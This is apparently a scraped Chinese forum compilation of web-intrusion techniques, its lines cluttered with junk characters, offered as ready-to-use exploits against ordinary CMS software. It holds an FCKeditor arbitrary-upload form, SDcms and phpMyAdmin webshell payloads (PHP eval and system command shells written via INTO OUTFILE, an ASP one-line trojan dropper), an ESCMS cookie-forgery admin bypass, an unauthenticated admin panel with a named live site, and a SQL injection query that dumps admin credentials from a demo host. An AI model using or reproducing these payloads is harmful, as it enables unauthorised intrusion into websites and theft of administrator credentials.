跳转到网站根目录上传任意文件。4 W2 e* U7 q2 Z( o! C
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件; S+ G( R0 w* m! q
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">6 Y: M. g6 d) F- F4 S) h
Upload a new file:<br>
9 M) R p, i# S* D* y<input type="file" name="NewFile" size="50"><br>% W8 W2 \/ M) E9 I4 G
<input id="btnUpload" type="submit" value="Upload">, @; d d6 e9 Q4 {4 c( p( k0 M+ v* ^/ ^
</form>* t3 S8 {% v* ?( }& K9 L4 {( }; T
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" M/ r2 {% K4 W7 D6 S7 |: i& a8 R$ b/ M% f6 \
SDcms 后台拿webshell3 u! v# q0 U9 [" V* \ D% U# G5 r
9 E. Q" |6 G' `* K
第一种方法:. j$ p, {( h) {+ Z
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
' O/ R' |. b/ ^2 c把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
+ ]' t n( Y$ x9 K1 H) s0 n用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。( q5 I( H E/ k- h/ E' s+ ?2 m
第二种方法:/ g4 |# H1 w. z2 e, h
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
4 H% f2 c" H' }" H在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!8 n! U. A' a( J0 j$ B+ \, T/ E
第三种方法:
7 U/ T; |+ x. l3 ?进入后台-->界面管理-->模板文件管理-->创建文件
( z2 x, J% r4 \: W文件名写入getshell.ashx
* c9 C" b% f: a% T. U) s) Q内容写入下面内容:1 D; S4 b9 l( x! e& |; ^
/====================复制下面的=========================/1 d9 b$ D. B& `6 J
<%@ WebHandler Language="C#" Class="Handler" %>/ @ L$ ?6 `) c* Q" j9 X% C# h
using System;: }; ~& _7 s9 f" C0 ^' ] C# @; l. H$ a
using System.Web;
3 A- |4 P; F L1 G1 i( v* rusing System.IO;4 h# a4 a+ d% I7 h2 S+ {) {
public class Handler : IHttpHandler {
7 D- D1 z4 Z6 B1 \public void ProcessRequest (HttpContext context) {2 o1 c/ H1 P( S. O: c3 T- j
context.Response.ContentType = "text/plain";
. S) B4 T Y! `9 CStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
! e) }+ F' x3 i4 @; L! {$ m, xfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
2 V: O6 C- C- K4 X( L$ F+ mfile1.Flush();/ W4 R! J" K8 D& Q; t1 U
file1.Close();
& F! \; z6 n+ D" P& x0 m}; {& G _3 f! q& g: I( p. @
public bool IsReusable {
# Q: A5 r: ] |' Z1 Lget {
& C* D, d# c0 w3 }, i. s, m; Q G& Nreturn false;( m' ?- B! a$ D" ?
}
1 M2 @/ a( Y3 v2 |5 P}3 z# X/ y# ]6 u, W, Q! Z; w
}
6 f, p- ^& n' b8 H$ B* n" ]- ?! {/=============================================/
2 x- R$ Z) b1 T1 o# Z: m6 }访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
2 ~5 X1 }. m" C会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接 j5 ^! P* d3 b/ q7 C
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------% w) t6 G: y% V7 k# b
! P& k; y' K% Z7 D1 x" HESCMS网站管理系统0day$ p( r$ i2 b3 J- z. J
, A7 P& O6 Q, A1 a后台登陆验证是通过admin/check.asp实现的, R& O( n1 M( ]" t# l P2 c
( Z# n6 O" A; A5 l* I3 q
首先我们打开http://target.com/admin/es_index.html
# R0 l' A7 j3 |/ x# K然后在COOKIE结尾加上
3 N+ U# M* n7 q; ESCMS$_SP2=ES_admin=st0p;
$ V" _$ |0 U7 A! ~ b修改,然后刷新
, U: }- a' M$ M7 n) C q" x! k: @, P进后台了嘎..
! ?* \7 L* Y8 j- s9 z) U9 ~6 g然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL- D( a) P* u5 F4 t1 F( x
2 M0 O$ X5 z8 P- J4 I利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
) \6 i% G& U# J2 f" D嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp: J' j, C& L# D2 z9 n- Y6 M
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
7 L: G/ [" w; K% ~/ a6 ^在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
- v: @8 k/ s2 M& Q) `------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' T! W% u+ p" W5 P7 d- b6 i3 i5 q
宁志网站管理系统后台无验证漏洞及修复
/ ^2 i0 u1 L2 a5 T p S1 H/ T1 g9 r: L. n/ v7 s" p" |+ r
网上搜了一下,好像没有发布.如有雷同纯粹巧合!& o4 ?6 y) V# b3 F; h) b7 @
官方网站:www.ningzhi.net% {' a2 B8 i; C$ L+ E2 Y I3 a/ B
学校网站管理系统 V.2011版本 & d5 M: q3 A' T- ^/ t
http://down.chinaz.com/soft/29943.htm * q# R$ t; o/ O8 ?* k. [2 H" B6 v
其它版本(如:政府版等),自行下载.1 |1 Q% A7 P0 @" F0 b
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~1 \0 M( w- U+ x
login.asp代码如下:. ~+ e5 T( }3 S6 ~6 h/ o& X$ o( L
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 6 T& I2 p4 \$ d9 H
manage.asp代码我就不帖出来了.反正也没验证.
/ U! R2 K3 E/ @8 \只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
/ G; q4 W8 ?6 G9 B0 H漏洞利用:5 b! c1 ?2 c/ E1 m
直接访问http://www.0855.tv/admin/manage.asp1 W, X1 |$ ? V8 n% I3 ^
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
$ p R; B, z8 a4 i----------------------------------------------------------------------------------------------------------------------------------------------------------------------------: O! a' Z, H9 L! b/ z6 c0 O9 [$ v
" e& p/ \8 R: R- P; f k
phpmyadmin拿shell的四种方法总结及修复
1 B/ J) q! T) a `7 P
4 z! c; X% u: [" j5 ?" P) v4 e方法一:
# @" n9 L, @; rCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL ); p: _2 {$ c/ F: ^ S# i/ M. A" d8 u) F
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
0 h+ o+ ~9 A- FSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';8 C9 P" g9 }* x/ g: C
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
8 q7 B7 ]; h j$ D 一句话连接密码:7on
* i1 e( O# \0 p6 c( ^5 `方法二:
4 k% e0 w9 Q' a; d; M$ C* J读取文件内容: select load_file('E:/xamp/www/s.php');. Q/ J% [8 Y6 J- g
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'8 n! C+ c9 T* O0 [
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'+ K/ ?) U& E' K
方法三:
+ ?/ X! t' d3 {# w) ZJhackJ版本 PHPmyadmin拿shell3 b( s" v9 z, g1 Q9 p0 T
Create TABLE study (cmd text NOT NULL);
9 \6 n( \1 e) P' oInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');# @# J3 N4 e6 P: R
select cmd from study into outfile 'E:/wamp/www/7.php';, K/ d3 o* ?8 U+ d/ T" {
Drop TABLE IF EXISTS study;
& i, [0 l8 ^" D* t, E<?php eval($_POST[cmd])?>% Z( k( _3 S6 z$ K- ?, {: N) ~1 m
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。/ z( N! e* k4 p& A, `) _6 F
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
; M% Y* R/ s ~: ~% TSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 15 v. y; K4 t c) f r: i8 c
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
9 a& ^7 Q# w4 Y方法四:$ q V- J2 }7 s- C
select load_file('E:/xamp/www/study.php');& q9 X* R, S- E
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
. N {/ T. S, S然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
" _& u- u. L. b6 C3 F) a9 z-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
% o' ]4 J/ [5 K% n' F
+ e2 h" t' t6 n. Z |7 \+ SNO.001中学网站管理系统 Build 110628 注入漏洞 |$ R! Z8 a" t, U. K! M
2 ]' u2 S/ z5 S6 O3 {' H% j$ o5 A( ENO.001中学网站管理系统功能模块:5 G2 T7 i' c- f3 c" C. a
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等6 {! Y7 B+ r6 k3 S% S
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息) H$ F2 _; ?& M& }4 L
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
+ M# u7 Y& h. d7 _8 e4.视频图片管理:一级分类,动态添加视频或者图片等信息; x8 y3 P: G, F n% z% Q, H
5.留言管理:对留言,修改,删除、回复等管理3 e0 |( h5 n7 s: S# N# w
6.校友频道:包括校友资料excel导出、管理等功能
0 h- q9 A! g' ]. i" T# o r* H7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页" c. j& p/ |- r1 t5 ]! x
默认后台:admin/login.asp) Q3 s2 F; T* i* v
官方演示:http://demo.001cms.net4 `8 t" r6 N' Z% r" Q3 l/ `8 j
源码下载地址:http://down.chinaz.com/soft/30187.htm
5 l) W/ w" }" A! B5 u, qEXP:5 j: w5 k% Y1 e9 I. B9 K
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
) e7 c3 j4 }1 u9 C7 ^7 f测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
8 F( W2 S& D6 Agetshell:后台有备份,你懂的5 j" O5 [3 ?& v' t8 e6 M0 Y/ ?5 X! H
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
/ o) o+ p' n. h8 R* _' J+ Z- j+ r1 a------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |